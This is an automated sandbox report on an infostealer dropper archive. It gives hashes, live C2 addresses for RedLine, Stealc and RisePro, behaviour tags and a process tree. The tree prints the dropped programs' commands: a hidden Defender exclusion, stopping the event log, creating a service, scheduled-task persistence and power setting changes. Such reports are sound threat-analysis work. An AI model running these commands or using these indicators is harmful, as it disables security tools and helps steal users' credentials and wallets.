Resubmissions

22-07-2024 06:49

240722-hltgastenn 1

20-07-2024 22:09

240720-12vcmsxfkc 10

20-07-2024 22:06

240720-1z7j7ayhmq 3

20-07-2024 22:05

240720-1zhaasyhln 3

20-07-2024 22:03

240720-1ygmdaygrp 3

20-07-2024 21:59

240720-1wg55aygml 3

Analysis

  • max time kernel
    149s
  • max time network
    296s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-07-2024 22:09

General

  • Target

    archive.rar

  • Size

    11.5MB

  • MD5

    691e3e042f77f3ca8b5344829029b272

  • SHA1

    43f3a009a7bd9ce972be8992151240cda02eb598

  • SHA256

    21a27ad9d564f6af8aa67437023baac60d5bad9316fac18dbace5af1ab85ec1f

  • SHA512

    2917da919add222f47b69a5e93e62872e422d74e7308edd556e0e1084234a6545a8018852ece5bc15eb96c54a5a43371b1008cdb0157430d52a2ee6a0f6f27c7

  • SSDEEP

    196608:1DOWMSWGX0Kb4zmkV0kPVhr6TmGeWgJazOarKlqlHSDWrVeL31DWmmvQP4ld:5OG5Bb4zlHPVheePayOesHU2VamvG4ld

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

C2

77.105.135.107:3445

Extracted

Family

stealc

Botnet

default

C2

http://85.28.47.31

Attributes
  • url_path

    /5499d72b3a3e55be.php

Extracted

Family

risepro

C2

194.110.13.70

77.105.133.27

Signatures

  • Modifies firewall policy service 3 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 9 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 40 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 45 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\archive.rar
    1⤵
    • Modifies registry class
    PID:3028
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4712
    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\archive.rar"
      2⤵
      • Checks processor information in registry
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3424
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3288
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CB6FBDD95B3A2A8E025D39A3F9C91740 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CB6FBDD95B3A2A8E025D39A3F9C91740 --renderer-client-id=2 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job /prefetch:1
          4⤵
            PID:1912
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2B78C6691A6726BE8A159A47946EA95B --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            4⤵
              PID:4464
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E155ED5B97B6D207C2794991B5D48F3E --mojo-platform-channel-handle=2264 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              4⤵
                PID:4012
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5AE355220187362BC4122C5FACC97CBF --mojo-platform-channel-handle=1992 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                4⤵
                  PID:2924
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3E5BAEA6763F42D380B3CDAB2404DD69 --mojo-platform-channel-handle=2024 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  4⤵
                    PID:2740
            • C:\Windows\System32\rundll32.exe
              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              1⤵
                PID:1636
              • C:\Program Files\7-Zip\7zFM.exe
                "C:\Program Files\7-Zip\7zFM.exe"
                1⤵
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:732
              • C:\Users\Admin\Desktop\setup.exe
                "C:\Users\Admin\Desktop\setup.exe"
                1⤵
                • Modifies firewall policy service
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:5000
                • C:\Users\Admin\Documents\SimpleAdobe\XtExdTwRk85Ef9lyLZjCawq3.exe
                  C:\Users\Admin\Documents\SimpleAdobe\XtExdTwRk85Ef9lyLZjCawq3.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:2132
                  • C:\Users\Admin\AppData\Local\Temp\is-2MV61.tmp\XtExdTwRk85Ef9lyLZjCawq3.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-2MV61.tmp\XtExdTwRk85Ef9lyLZjCawq3.tmp" /SL5="$901E0,4806151,54272,C:\Users\Admin\Documents\SimpleAdobe\XtExdTwRk85Ef9lyLZjCawq3.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetWindowsHookEx
                    PID:884
                    • C:\Users\Admin\AppData\Local\Sound Changer Beta\soundchangerbeta32_64.exe
                      "C:\Users\Admin\AppData\Local\Sound Changer Beta\soundchangerbeta32_64.exe" -i
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      PID:1984
                    • C:\Users\Admin\AppData\Local\Sound Changer Beta\soundchangerbeta32_64.exe
                      "C:\Users\Admin\AppData\Local\Sound Changer Beta\soundchangerbeta32_64.exe" -s
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      PID:5388
                • C:\Users\Admin\Documents\SimpleAdobe\Ks8jmRuej1Qp4HT4H48oNVZ6.exe
                  C:\Users\Admin\Documents\SimpleAdobe\Ks8jmRuej1Qp4HT4H48oNVZ6.exe
                  2⤵
                  • Executes dropped EXE
                  PID:4812
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    3⤵
                    • Power Settings
                    PID:6768
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    3⤵
                    • Power Settings
                    PID:6776
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    3⤵
                    • Power Settings
                    PID:7048
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    3⤵
                    • Power Settings
                    PID:7232
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe delete "CIFUBVHI"
                    3⤵
                    • Launches sc.exe
                    PID:7240
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
                    3⤵
                    • Launches sc.exe
                    PID:7332
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop eventlog
                    3⤵
                    • Launches sc.exe
                    PID:6436
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe start "CIFUBVHI"
                    3⤵
                    • Launches sc.exe
                    PID:752
                • C:\Users\Admin\Documents\SimpleAdobe\rqZyiYpynkyFOoFpWL8VIS3R.exe
                  C:\Users\Admin\Documents\SimpleAdobe\rqZyiYpynkyFOoFpWL8VIS3R.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:872
                  • C:\Users\Admin\AppData\Local\Temp\7zS7F48.tmp\Install.exe
                    .\Install.exe
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:5260
                    • C:\Users\Admin\AppData\Local\Temp\7zS8CA6.tmp\Install.exe
                      .\Install.exe /WdKhwdidG "385132" /S
                      4⤵
                      • Checks BIOS information in registry
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Enumerates system info in registry
                      • Suspicious use of SetWindowsHookEx
                      PID:5636
                      • C:\Windows\SysWOW64\forfiles.exe
                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                        5⤵
                          PID:2496
                          • C:\Windows\SysWOW64\cmd.exe
                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            6⤵
                              PID:224
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2832
                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                  8⤵
                                    PID:5488
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "bIIyZWzHnmHiZsesSy" /SC once /ST 22:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8CA6.tmp\Install.exe\" Nz /gpdidL 385132 /S" /V1 /F
                              5⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:6284
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 1140
                              5⤵
                              • Program crash
                              PID:5320
                      • C:\Users\Admin\Documents\SimpleAdobe\RHdyedZdEglwILJnVm4Uv5lc.exe
                        C:\Users\Admin\Documents\SimpleAdobe\RHdyedZdEglwILJnVm4Uv5lc.exe
                        2⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Drops startup file
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:1016
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
                          3⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:764
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
                          3⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:5732
                      • C:\Users\Admin\Documents\SimpleAdobe\aX_gnwqf8iK9BXkE4g5kS6KK.exe
                        C:\Users\Admin\Documents\SimpleAdobe\aX_gnwqf8iK9BXkE4g5kS6KK.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of SetWindowsHookEx
                        PID:2476
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          3⤵
                            PID:5208
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            3⤵
                              PID:5252
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              3⤵
                                PID:5320
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                3⤵
                                  PID:5356
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  3⤵
                                    PID:5400
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    3⤵
                                      PID:5432
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                      3⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5468
                                  • C:\Users\Admin\Documents\SimpleAdobe\FsbJKh8aonw5sQtLcXpEFxgS.exe
                                    C:\Users\Admin\Documents\SimpleAdobe\FsbJKh8aonw5sQtLcXpEFxgS.exe
                                    2⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Drops file in Windows directory
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2448
                                    • C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
                                      "C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
                                      3⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Suspicious use of SetThreadContext
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5588
                                      • C:\Users\Admin\AppData\Local\Temp\1000017001\go.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000017001\go.exe"
                                        4⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2016
                                        • C:\Windows\system32\cmd.exe
                                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B24F.tmp\B250.tmp\B251.bat C:\Users\Admin\AppData\Local\Temp\1000017001\go.exe"
                                          5⤵
                                            PID:3840
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
                                              6⤵
                                                PID:2080
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffaa0a3ab58,0x7ffaa0a3ab68,0x7ffaa0a3ab78
                                                  7⤵
                                                    PID:5340
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1728 --field-trial-handle=2412,i,331190154629732667,9354605065011798376,131072 /prefetch:2
                                                    7⤵
                                                      PID:3360
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=2412,i,331190154629732667,9354605065011798376,131072 /prefetch:8
                                                      7⤵
                                                        PID:5152
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2008 --field-trial-handle=2412,i,331190154629732667,9354605065011798376,131072 /prefetch:8
                                                        7⤵
                                                          PID:5512
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3116 --field-trial-handle=2412,i,331190154629732667,9354605065011798376,131072 /prefetch:1
                                                          7⤵
                                                            PID:4044
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3124 --field-trial-handle=2412,i,331190154629732667,9354605065011798376,131072 /prefetch:1
                                                            7⤵
                                                              PID:1060
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4044 --field-trial-handle=2412,i,331190154629732667,9354605065011798376,131072 /prefetch:1
                                                              7⤵
                                                                PID:7136
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
                                                              6⤵
                                                                PID:812
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ffa9f9d46f8,0x7ffa9f9d4708,0x7ffa9f9d4718
                                                                  7⤵
                                                                    PID:5356
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,7113396949860208705,8731049698339891128,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
                                                                    7⤵
                                                                      PID:5140
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,7113396949860208705,8731049698339891128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
                                                                      7⤵
                                                                        PID:4940
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,7113396949860208705,8731049698339891128,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8
                                                                        7⤵
                                                                          PID:6164
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
